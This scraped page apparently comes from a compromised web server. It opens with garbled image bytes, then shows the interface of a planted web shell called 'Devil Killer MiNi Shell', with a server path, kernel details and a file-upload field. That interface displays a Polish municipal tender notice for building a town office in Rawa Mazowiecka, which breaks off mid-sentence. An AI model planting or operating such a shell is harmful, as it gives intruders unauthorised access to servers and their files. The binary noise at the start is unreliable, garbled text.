JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250716/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250716/0032958101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa budynku użyteczności publicznej na obszarze zdegradowanym </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RAWA MAZOWIECKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148420</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Konstytucji 3 Maja 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rawa Mazowiecka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">468144241</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">468144241</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@rawam.ug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.rawam.ug.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa budynku użyteczności publicznej na obszarze zdegradowanym </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c9e89bc7-26c6-4ba8-8dcb-1aeaa93bfc72</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00329581</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00014940/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa budynku użyteczności publicznej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c9e89bc7-26c6-4ba8-8dcb-1aeaa93bfc72 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Komunikacja w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze”. Adres strony internetowej https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Sposób złożenia oferty w tym zaszyfrowania oferty opisany został w Regulaminie Platformy e-Zamówienia dostępnym na stronie internetowej https://ezamowienia.gov.pl oraz w informacjach zamieszczonych w zakładce „Centrum Pomocy”. Wykonawca, aby wziąć udział w postępowaniu o udzielenie zamówienia publicznego i złożyć ofertę do postępowania musi posiadać konto na Platformie e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje zawarte w rozdziale 22 SWZ - OCHRONA DANYCH OSOBOWYCH</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIR-IRK.271.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje budowę budynku administracyjnego Urzędu Gminy Rawa Mazowiecka. Zaplanowane roboty budowlane będą prowadzone na nieruchomości położonej w Rawie Mazowieckiej <br/>– obręb 4, dz. nr 334/4 i 334/1 – stanowiącej własność Zamawiającego - Gminy Rawa Mazowiecka. <br/>Zamówienie będzie realizowane na podstawie decyzji Starosty Rawskiego z dn. 30 grudnia 2022 r. o pozwoleniu na budowę budynku administracyjnego Urzędu Gminy Rawa Mazowiecka (kat. XII) o pow. zabudowy – 430,00 m2, pow. użytkowej – 957,61 m2 i kubaturze – 4.370,00 m3 wraz niezbędną infrastrukturą techniczną oraz z częściową rozbiórka istniejącego budynku komunalnego na działkach o nr ewid. 334/4 i 334/1 w obrębie ewid. nr 0004 Miasta Rawa Mazowiecka.<br/>Zaprojektowany to budynek niski, niepodpiwniczony, o 3 kondygnacjach nadziemnych.<br/>Niniejsze zamówienie w swoim zakresie nie obejmuje wykonania wszystkich robót budowlanych określonych w dokumentacjach projektowych oraz w STWiOR, ale wykonanie ich większej części, w zakresie wynikającym z dokumentów niniejszego postępowania. Wykonanie zamówienia pn.: „Budowa budynku użyteczności publicznej na obszarze zdegradowanym” było już przedmiotem wcześniejszego zamówienia. W jego wyniku w styczniu 2024 r. zostały rozpoczęte roboty budowlane, które były faktycznie prowadzone przez poprzedniego wykonawcę do lipca 2024 r. W tym czasie zostały zrealizowane następujące roboty:<br/>1)	w zakresie budynku: <br/>- odłączono przyłącza: gazowe, elektroenergetyczne, wodne, teletechniczne,<br/>- wykuto 13 ościeżnic stalowych,<br/>- rozebrano część ścian, w tym wszystkie ściany działowe, <br/>- rozebrano kominy ponad dachem,<br/>- rozebrano część stropów ,,Kleina’’ pod montaż konstrukcji wsporczej,<br/>- rozebrano podłogi drewniane na legarach na parterze i I. piętrze,<br/>- zdemontowano częściowo instalacje: gazową, elektryczną, wodno-kanalizacyjną i co.,<br/>- usunięto z budynku i wywieziono gruz, <br/>- usunięto z budynku i wywieziono szlakę ułożoną pod podłogami drewnianymi, <br/>- wykonano część stóp i ław fundamentowych,<br/>2)	w zakresie zagospodarowania terenu:<br/>- wykarczowano drzewa przeznaczone do usunięcia,<br/>- rozebrano 40,62 mb krawężników betonowych 15x30cm,<br/>- wykorytowano na pow. ok. 110 m2 i wypełniono kruszywem obszar po ,,terenach zielonych’’.<br/>Stopień zaawansowania prac fundamentowych został przedstawiony w formie graficznej na rysunku URM-K-PT-051 00, na którym kolorem żółtym zaznaczono elementy już wykonane – nazwa pliku URM-K-PT-051 00_zaawansowanie.<br/>Poza powyżej wymienionymi robotami Zamawiający:<br/>- wybudował nowe przyłącze gazowe oraz nowe przyłącze wodne do budynku usytuowanego na sąsiedniej nieruchomości - dz. nr ewid. 335/3 - z uwagi że następujące instalacje: wodna, kanalizacyjna i gazowa były podłączone bezpośrednio do instalacji w budynku przeznaczonym do rozbiórki,<br/>- przebudował przyłącze gazowe do istniejącego budynku Urzędy Gminy, z uwagi że kolidowało z zaprojektowaną konstrukcją nowego budynku. <br/>Aktualny stan budynku przeznaczonego do rozbiórki oraz jego otoczenia przedstawia dokumentacja fotograficzna umieszczona w folderze Zdjęcia.<br/>Zakres prac objęty niniejszym zamówieniem obejmuje wykonanie następujących robót budowlanych:<br/>1)	dokończenie rozbiórki budynku komunalnego zlokalizowanego w granicy z działką 335/3 z pozostawieniem ściany usytuowanej w granicy na odcinku przylegającym do sąsiednich budynków usytuowanych na działce nr 335/3; <br/>Ważne informacje: <br/>- zgodnie z opracowaną dokumentacją techniczną zachodzi konieczność pozostawienia fragmentu ściany rozbieranego budynku usytuowanej przy granicy z dz. nr 335/3, w części przylegającej do usytuowanych na ww. działce: budynku mieszkalnego, budynku handlowego oraz budynku gospodarczego/kotłowni, z uwagi, że ww. budynki na odcinku stycznym z budynkiem zaplanowanym do rozbiórki nie posiadają własnych zewnętrznych ścian konstrukcyjnych (zostały dobudowane do budynku przeznaczonego do rozbiórki); ze względu że rozebranie usytuowanej w granicy ściany na odcinku przylegającym do wspomnianych budynków jest niemożliwe, zaprojektowano rozwiązanie polegające na zmontowaniu tymczasowej stalowej konstrukcji wsporczej - zamocowanej do częściowo uprzednio wykonanych elementów żelbetowej konstrukcji nowego budynku - która na czas rozbiórki aż do chwili wybudowania konstrukcji nowego budynku wspierać będzie ścianę usytuowaną w granicy, nie przeznaczoną do rozbiórki. Po wybudowaniu żelbetowej konstrukcji nowego budynku to ona stanowić będzie podparcie ściany w granicy, a tymczasowa stalowa konstrukcja wsporcza będzie usunięta; <br/>-	Wykonawca zobowiązany jest do prowadzenia robót budowlanych w taki sposób, żeby nie zakłócić statyki budynków i budowli usytuowanych na dz. nr 335/3,<br/>- nałożony jest wymóg prowadzenia rozbiórki w sposób ręczny tj. przy pomocy narzędzi ręcznych, elektronarzędzi, ręcznych narzędzi hydraulicznych itp.; <br/>- konieczne jest zabezpieczenie sąsiedniej nieruchomości przed potencjalnymi uszkodzeniami oraz ze względów bezpieczeństwa na czas wykonywania robót budowlanych w tym robót rozbiórkowych,<br/>-	z uwagi, że z budynku usytuowanego na sąsiedniej nieruchomości - dz. nr ewid. 335/3 - do sieci kanalizacyjnej na działce dz. 334/4 przebiega przez piwnicę budynku przeznaczonego do rozbiórki użytkowana instalacja kanalizacyjna (przyłącze), która koliduje z zaplanowanymi robotami budowlanymi istnieje wymóg jej przebudowy przy jednoczesnym zapewnieniu zdolności do odprowadzenia ścieków do sieci kanalizacyjnej przez cały okres budowy; <br/>2)	budowę na dz. 334/4 budynku administracyjnego tj. w szczególności: <br/>a)	w zakresie robót ogólnobudowlanych:<br/>- wykonanie konstrukcji budynku, w szczególności: fundamentów, ścian, słupów, stropów, schodów, więźby dachowej,<br/>- wykonanie izolacji ścian fundamentowych,<br/>- wykonanie na parterze podkładów/podbudów betonowych na gruncie, <br/>- wykonanie izolacji oraz podłogi z płyt OSB na strychu – nad stropem 2. piętra,<br/>- wykonanie pokrycia dachowego z orynnowaniem,<br/>- wykonanie ścian działowych,<br/>-	montaż okien i drzwi zewnętrznych oraz bram garażowych,<br/>-	wykonanie elewacji - docieplenia ścian i stropów zewnętrznych, montaż parapetów zewnętrznych, <br/>- wykonanie tynków wewnętrznych,<br/>- wykonanie izolacji podposadzkowych i posadzek cementowych (w garażu na gotowo), <br/>- wykonanie wyłazu na strych,<br/>- montaż parapetów wewnętrznych,<br/>- wykonanie sufitów podwieszanych<br/>- w pomieszczeniu gospodarczym 1/08 (węzeł cieplny) wykończenie podłogi płytkami gresowymi i ścian glazurą na pełną wysokość (do sufitu),<br/>b)	w zakresie instalacji sanitarnych:<br/>- wykonanie przyłącza wodociągowego (dobudowa instalacji wodnej za wodomierzem) z piwnicy istniejącego budynku Urzędu Gminy,<br/>- wykonanie zewnętrznej instalacji sanitarnej (przyłącza kanalizacyjnego) z włączeniem do istniejącej studni kanalizacji sanitarnej, bez likwidacji istniejącego zbiornika bezodpływowego,<br/>-	wykonanie tymczasowej oraz docelowej instalacji kanalizacyjnej odprowadzającej ścieki z sąsiedniego budynku (usytuowanego na działce 335/3), z włączeniem do zaprojektowanej dla budynku administracyjnego instalacji sanitarnej, <br/>- rozbiórkę instalacji kanalizacyjnej odprowadzającej ścieki z sąsiedniego budynku (usytuowanego na działce 335/3) wraz ze studnią kanalizacyjną – w zakresie kolidującym z budową budynku administracyjnego,<br/>- wykonanie instalacji wentylacji mechanicznej,<br/>- wykonanie instalacji klimatyzacji,<br/>- wykonanie instalacji kanalizacji sanitarnej, bez montażu urządzeń sanitarnych, <br/>- wykonanie instalacji wodnej (zimnej i ciepłej wody), bez montażu urządzeń sanitarnych (armatury),<br/>- wykonanie instalacji centralnego ogrzewania, <br/>- wykonanie instalacji ciepła technicznego,<br/>c)	w zakresie instalacji elektrycznych i teletechnicznych wykonanie:<br/>- elektrycznej instalacji zasilającej z rozdzielni głównej (RG) usytuowanej w piwnicy istniejącego budynku Urzędu Gminy (pom. 0/04) do rozdzielni głównej (RG2) zaprojektowanej na parterze zaprojektowanego budynku,<br/>- instalacji elektrycznej wewnętrznej z podziałem na obwody podstawowe oraz obwody z podtrzymaniem rezerwowym napięcia; w zakresie instalacji zasilania rezerwowego niniejsze zamówienie obejmuje wykonanie instalacji, ale nie obejmuje montażu samego zasilacza UPS, <br/>-	instalacji dwóch przeciwpożarowych wyłączników prądu dla zaprojektowanego budynku – PWP2 i PWP UPS, <br/>- instalacji gniazd w tym: gniazd elektrycznych ogólnego przeznaczenia, oraz zespołów PEL (punkt elektryczno-logiczny) dedykowanych do zasilania urządzeń IT,<br/>- instalacji oświetlenia ogólnego, z montażem opraw oświetleniowych w następującym zakresie:<br/>o	na parterze (przyziemiu) w sufitach podwieszanych oprawy z indeksem B, C i F,<br/>o	na I piętrze w sufitach podwieszanych oprawy z indeksem B, I, K i L, <br/>- instalacji oświetlenia ewakuacyjnego, bez montażu opraw ewakuacyjnych,<br/>-	okablowania strukturalnego; niniejsze zamówienie obejmuje poprowadzenie przewodów UTP kat. 6 od poszczególnych stanowisk sieci LAN do serwerowni w istniejącym budynku Urzędu Gminy i ich zakończenie odpowiednio adapterem lub oznaczonym przewodem, <br/>- instalacji dla wentylacji mechanicznej, <br/>- instalacji dla klimatyzacji,<br/>- instalacji dla monitoringu CCTV, niniejsze zamówienie nie obejmuje montażu kamer, <br/>- instalacji dla agregatu prądotwórczego, bez montażu samego agregatu,<br/>- instalacji systemu antywłamaniowego,<br/>- instalacji detekcji gazu,<br/>-	instalacji odgromowej,<br/>- instalacji połączeń wyrównawczych.<br/>Szczegóły robót budowlanych, jakie Wykonawca ma obowiązek wykonać podczas realizacji zamówienia określają dokumentacje projektowe oraz specyfikacje techniczne wykonania i odbioru robót (STWiOR) (Załącznik nr 10 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45223500-1 - Konstrukcje z betonu zbrojonego</p> <p class="mb-0">45262310-7 - Zbrojenie</p> <p class="mb-0">45262520-2 - Roboty murowe</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">09321000-5 - Gorąca woda</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">72710000-0 - Usługi w zakresie lokalnej sieci komputerowej</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">600 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty nastąpi zgodnie z ustawą, na podstawie poniższych kryteriów, którym odpowiada określona liczba punktów. Zamawiający zastosuje zaokrąglenie wyników do dwóch miejsc po przecinku (jeśli 3 cyfra po przecinku będzie mniejsza od 5 zaokrąglenie nastąpi w dół, zaś jeśli trzecia cyfra po przecinku będzie większa bądź równa od 5 zaokrąglenie nastąpi w górę).<br/>Za ofertę najkorzystniejszą uważa się ofertę, która przedstawi najkorzystniejszy bilans (największa ilość punktów przyznanych w oparciu o ustalone kryteria). Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1. zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>3. uprawnień sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>4. zdolności technicznej lub zawodowej;<br/>Wykonawca spełni powyższy warunek jeśli:<br/>4.1 Udokumentuje wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonanie co najmniej dwóch robót budowlanych o podobnym charakterze, tj. co najmniej dwóch robót budowlanych polegających na budowie, przebudowie, remoncie lub rozbudowie budynku użyteczności publicznej lub innego budynku o wartości minimum 1.000.000,00 zł netto każda (również w przypadku, gdy w ramach zadania były wykonywane inne roboty, jak przyłącza, parkingi, ciągi piesze, ogrodzenia, tereny zielone wokół budynku). Zasobu wiedzy i doświadczenia nie można łączyć. W przypadku wykonawców wspólnie ubiegających się o zamówienie przynajmniej jeden ze wspólnie ubiegających się wykonawców musi spełnić w całości ten warunek.<br/>W przypadku korzystania z zasobów podwykonawców lub podmiotów trzecich warunek ten spełnić musi w całości wykonawca lub podwykonawca lub podmiot trzeci.<br/>4.2 Dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje niezbędne do wykonania zamówienia, tj.:<br/>a)	min. jedną osobą (która będzie pełniła funkcję kierownika budowy) posiadającą odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej, których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia. <br/>b)	min. jedną osobą posiadającą odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia. <br/>c) min. jedną osobą posiadającą odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi w specjalności 